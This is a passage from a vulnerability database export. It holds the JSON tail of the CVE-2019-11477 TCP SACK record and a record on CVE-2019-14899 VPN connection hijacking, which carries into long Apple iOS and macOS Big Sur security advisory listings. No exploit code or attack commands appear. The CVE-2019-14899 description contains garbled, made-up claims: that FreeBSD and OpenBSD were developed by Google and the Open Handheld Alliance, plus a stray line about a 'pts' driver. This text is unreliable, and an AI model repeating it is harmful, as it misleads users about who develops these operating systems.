        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.18.0-1016.18"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1085.96"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.15.0-1047.51"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.0.0-1008.8"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.18.0-22.23~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1015.17~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10167"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10166"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/2974891"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-10166"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10168"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10161"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-10168"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-10161"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-10167"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-3896"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3896"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#905115"
      },
      {
        "db": "VULHUB",
        "id": "VHN-143127"
      },
      {
        "db": "PACKETSTORM",
        "id": "153346"
      },
      {
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "db": "PACKETSTORM",
        "id": "153328"
      },
      {
        "db": "PACKETSTORM",
        "id": "153543"
      },
      {
        "db": "PACKETSTORM",
        "id": "153430"
      },
      {
        "db": "PACKETSTORM",
        "id": "153316"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-681"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11477"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#905115"
      },
      {
        "db": "VULHUB",
        "id": "VHN-143127"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-11477"
      },
      {
        "db": "PACKETSTORM",
        "id": "153346"
      },
      {
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "db": "PACKETSTORM",
        "id": "153328"
      },
      {
        "db": "PACKETSTORM",
        "id": "153543"
      },
      {
        "db": "PACKETSTORM",
        "id": "153430"
      },
      {
        "db": "PACKETSTORM",
        "id": "153316"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-681"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11477"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-06-20T00:00:00",
        "db": "CERT/CC",
        "id": "VU#905115"
      },
      {
        "date": "2019-06-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-143127"
      },
      {
        "date": "2019-06-19T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-11477"
      },
      {
        "date": "2019-06-19T17:20:41",
        "db": "PACKETSTORM",
        "id": "153346"
      },
      {
        "date": "2019-10-23T18:32:10",
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "date": "2019-06-18T15:44:18",
        "db": "PACKETSTORM",
        "id": "153328"
      },
      {
        "date": "2019-07-08T14:38:09",
        "db": "PACKETSTORM",
        "id": "153543"
      },
      {
        "date": "2019-06-25T23:50:27",
        "db": "PACKETSTORM",
        "id": "153430"
      },
      {
        "date": "2019-06-17T19:16:05",
        "db": "PACKETSTORM",
        "id": "153316"
      },
      {
        "date": "2019-06-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201906-681"
      },
      {
        "date": "2019-06-19T00:15:12.640000",
        "db": "NVD",
        "id": "CVE-2019-11477"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-07-08T00:00:00",
        "db": "CERT/CC",
        "id": "VU#905115"
      },
      {
        "date": "2023-01-17T00:00:00",
        "db": "VULHUB",
        "id": "VHN-143127"
      },
      {
        "date": "2023-08-16T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-11477"
      },
      {
        "date": "2023-01-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201906-681"
      },
      {
        "date": "2024-02-27T21:04:17.560000",
        "db": "NVD",
        "id": "CVE-2019-11477"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "153346"
      },
      {
        "db": "PACKETSTORM",
        "id": "153328"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-681"
      }
    ],
    "trust": 0.8
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple TCP Selective Acknowledgement (SACK) and Maximum Segment Size (MSS) networking vulnerabilities may cause denial-of-service conditions in Linux and FreeBSD kernels",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#905115"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-681"
      }
    ],
    "trust": 0.6
  }
}

var-201912-0930
Vulnerability from variot

A vulnerability was discovered in Linux, FreeBSD, OpenBSD, MacOS, iOS, and Android that allows a malicious access point, or an adjacent user, to determine if a connected user is using a VPN, make positive inferences about the websites they are visiting, and determine the correct sequence and acknowledgement numbers in use, allowing the bad actor to inject data into the TCP stream. This provides everything that is needed for an attacker to hijack active connections inside the VPN tunnel. Unspecified vulnerabilities exist in multiple products.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Android is a Linux-based open source operating system developed by Google and the Open Handheld Alliance (OHA). FreeBSD is a Unix-like operating system developed by the Google Foundation and the Open Handheld Alliance (OHA) Foundation. pts is a pseudo-terminal driver used in it. OpenBSD is a cross-platform, BSD-based UNIX-like operating system developed by the Google (Google) project team and the Open Handheld Alliance (OHA) project team. There are security holes in OpenVPN. CVE-2020-9976: Rias A. Murdoch (@SJMurdoch) of OneSpan's Innovation Centre (onespan.com) and University College London, Jack Cable of Lightning Security, Ryan Pickren (ryanpickren.com), Yair Amit for their assistance. Entry added November 12, 2020

Installation note:

This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/

iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device.

The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device.

To check that the iPhone, iPod touch, or iPad has been updated:

  • Navigate to Settings
  • Select General
  • Select About. The version after applying this update will be "iOS 14.0 and iPadOS 14.0". -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

APPLE-SA-2020-12-14-4 Additional information for APPLE-SA-2020-11-13-1 macOS Big Sur 11.0.1

macOS Big Sur 11.0.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT211931.

AMD Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2020-27914: Yu Wang of Didi Research America CVE-2020-27915: Yu Wang of Didi Research America Entry added December 14, 2020

App Store Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to gain elevated privileges Description: This issue was addressed by removing the vulnerable code. CVE-2020-27903: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab

Audio Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2020-27910: JunDong Xie and XingWei Lin of Ant Security Light- Year Lab

Audio Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: An out-of-bounds write was addressed with improved input validation. CVE-2020-27916: JunDong Xie of Ant Security Light-Year Lab

Audio Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to read restricted memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2020-9943: JunDong Xie of Ant Group Light-Year Security Lab

Audio Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to read restricted memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2020-9944: JunDong Xie of Ant Group Light-Year Security Lab

Bluetooth Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to cause unexpected application termination or heap corruption Description: Multiple integer overflows were addressed with improved input validation. CVE-2020-27906: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong Security Lab

CoreAudio Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2020-27908: JunDong Xie and XingWei Lin of Ant Security Light- Year Lab CVE-2020-27909: Anonymous working with Trend Micro Zero Day Initiative, JunDong Xie and XingWei Lin of Ant Security Light-Year Lab CVE-2020-9960: JunDong Xie and XingWei Lin of Ant Security Light-Year Lab Entry added December 14, 2020

CoreAudio Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: An out-of-bounds write was addressed with improved input validation. CVE-2020-10017: Francis working with Trend Micro Zero Day Initiative, JunDong Xie of Ant Security Light-Year Lab

CoreCapture Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed with improved memory management. CVE-2020-9949: Proteas

CoreGraphics Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds write was addressed with improved input validation. CVE-2020-9883: an anonymous researcher, Mickey Jin of Trend Micro

Crash Reporter Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A local attacker may be able to elevate their privileges Description: An issue existed within the path validation logic for symlinks. This issue was addressed with improved path sanitization. CVE-2020-10003: Tim Michaud (@TimGMichaud) of Leviathan

CoreText Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A logic issue was addressed with improved state management. CVE-2020-27922: Mickey Jin of Trend Micro Entry added December 14, 2020

CoreText Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted text file may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2020-9999: Apple Entry updated December 14, 2020

Disk Images Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds read was addressed with improved input validation. CVE-2020-9965: Proteas CVE-2020-9966: Proteas

Finder Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Users may be unable to remove metadata indicating where files were downloaded from Description: The issue was addressed with additional user controls. CVE-2020-27894: Manuel Trezza of Shuggr (shuggr.com)

FontParser Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: A buffer overflow was addressed with improved size validation. CVE-2020-9962: Yiğit Can YILMAZ (@yilmazcanyigit) Entry added December 14, 2020

FontParser Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: An out-of-bounds write was addressed with improved input validation. CVE-2020-27952: an anonymous researcher, Mickey Jin and Junzhi Lu of Trend Micro Entry added December 14, 2020

FontParser Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2020-9956: Mickey Jin and Junzhi Lu of Trend Micro Mobile Security Research Team working with Trend Micro’s Zero Day Initiative Entry added December 14, 2020

FontParser Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed with improved input validation. CVE-2020-27931: Apple Entry added December 14, 2020

FontParser Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted font may lead to arbitrary code execution. Apple is aware of reports that an exploit for this issue exists in the wild. Description: A memory corruption issue was addressed with improved input validation. CVE-2020-27930: Google Project Zero

FontParser Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2020-27927: Xingwei Lin of Ant Security Light-Year Lab

Foundation Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A local user may be able to read arbitrary files Description: A logic issue was addressed with improved state management. CVE-2020-10002: James Hutchins

HomeKit Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An attacker in a privileged network position may be able to unexpectedly alter application state Description: This issue was addressed with improved setting propagation. CVE-2020-9978: Luyi Xing, Dongfang Zhao, and Xiaofeng Wang of Indiana University Bloomington, Yan Jia of Xidian University and University of Chinese Academy of Sciences, and Bin Yuan of HuaZhong University of Science and Technology Entry added December 14, 2020

ImageIO Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2020-9955: Mickey Jin of Trend Micro, Xingwei Lin of Ant Security Light-Year Lab Entry added December 14, 2020

ImageIO Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2020-27924: Lei Sun Entry added December 14, 2020

ImageIO Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds write was addressed with improved input validation. CVE-2020-27912: Xingwei Lin of Ant Security Light-Year Lab CVE-2020-27923: Lei Sun Entry updated December 14, 2020

ImageIO Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2020-9876: Mickey Jin of Trend Micro

Intel Graphics Driver Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2020-10015: ABC Research s.r.o. working with Trend Micro Zero Day Initiative CVE-2020-27897: Xiaolong Bai and Min (Spark) Zheng of Alibaba Inc., and Luyi Xing of Indiana University Bloomington Entry added December 14, 2020

Intel Graphics Driver Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2020-27907: ABC Research s.r.o. working with Trend Micro Zero Day Initiative Entry added December 14, 2020

Image Processing Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds write was addressed with improved input validation. CVE-2020-27919: Hou JingYi (@hjy79425575) of Qihoo 360 CERT, Xingwei Lin of Ant Security Light-Year Lab Entry added December 14, 2020

Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory Description: Multiple memory corruption issues were addressed with improved input validation. CVE-2020-9967: Alex Plaskett (@alexjplaskett) Entry added December 14, 2020

Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed with improved memory management. CVE-2020-9975: Tielei Wang of Pangu Lab Entry added December 14, 2020

Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved state handling. CVE-2020-27921: Linus Henze (pinauten.de) Entry added December 14, 2020

Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A logic issue existed resulting in memory corruption. This was addressed with improved state management. CVE-2020-27904: Zuozhi Fan (@pattern_F_) of Ant Group Tianqong Security Lab

Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An attacker in a privileged network position may be able to inject into active connections within a VPN tunnel Description: A routing issue was addressed with improved restrictions. CVE-2019-14899: William J. Tolley, Beau Kujath, and Jedidiah R. Crandall

Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to disclose kernel memory. Apple is aware of reports that an exploit for this issue exists in the wild. Description: A memory initialization issue was addressed. CVE-2020-27950: Google Project Zero

Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to determine kernel memory layout Description: A logic issue was addressed with improved state management. CVE-2020-9974: Tommy Muir (@Muirey03)

Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved state management. CVE-2020-10016: Alex Helie

Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of reports that an exploit for this issue exists in the wild. Description: A type confusion issue was addressed with improved state handling. CVE-2020-27932: Google Project Zero

libxml2 Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing maliciously crafted web content may lead to code execution Description: A use after free issue was addressed with improved memory management. CVE-2020-27917: found by OSS-Fuzz CVE-2020-27920: found by OSS-Fuzz Entry updated December 14, 2020

libxml2 Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution Description: An integer overflow was addressed through improved input validation. CVE-2020-27911: found by OSS-Fuzz

libxpc Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to elevate privileges Description: A logic issue was addressed with improved validation. CVE-2020-9971: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab Entry added December 14, 2020

libxpc Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to break out of its sandbox Description: A parsing issue in the handling of directory paths was addressed with improved path validation. CVE-2020-10014: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab

Logging Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A local attacker may be able to elevate their privileges Description: A path handling issue was addressed with improved validation. CVE-2020-10010: Tommy Muir (@Muirey03)

Mail Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to unexpectedly alter application state Description: This issue was addressed with improved checks. CVE-2020-9941: Fabian Ising of FH Münster University of Applied Sciences and Damian Poddebniak of FH Münster University of Applied Sciences

Messages Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A local user may be able to discover a user’s deleted messages Description: The issue was addressed with improved deletion. CVE-2020-9988: William Breuer of the Netherlands CVE-2020-9989: von Brunn Media

Model I/O Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2020-10011: Aleksandar Nikolic of Cisco Talos Entry added December 14, 2020

Model I/O Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2020-13524: Aleksandar Nikolic of Cisco Talos

Model I/O Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution Description: A logic issue was addressed with improved state management. CVE-2020-10004: Aleksandar Nikolic of Cisco Talos

NetworkExtension Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to elevate privileges Description: A use after free issue was addressed with improved memory management. CVE-2020-9996: Zhiwei Yuan of Trend Micro iCore Team, Junzhi Lu and Mickey Jin of Trend Micro

NSRemoteView Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A sandboxed process may be able to circumvent sandbox restrictions Description: A logic issue was addressed with improved restrictions. CVE-2020-27901: Thijs Alkemade of Computest Research Division Entry added December 14, 2020

NSRemoteView Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to preview files it does not have access to Description: An issue existed in the handling of snapshots. The issue was resolved with improved permissions logic. CVE-2020-27900: Thijs Alkemade of Computest Research Division

PCRE Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Multiple issues in pcre Description: Multiple issues were addressed by updating to version 8.44. CVE-2019-20838 CVE-2020-14155

Power Management Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to determine kernel memory layout Description: A logic issue was addressed with improved state management. CVE-2020-10007: singi@theori working with Trend Micro Zero Day Initiative

python Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Cookies belonging to one origin may be sent to another origin Description: Multiple issues were addressed with improved logic. CVE-2020-27896: an anonymous researcher

Quick Look Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious app may be able to determine the existence of files on the computer Description: The issue was addressed with improved handling of icon caches. CVE-2020-9963: Csaba Fitzl (@theevilbit) of Offensive Security

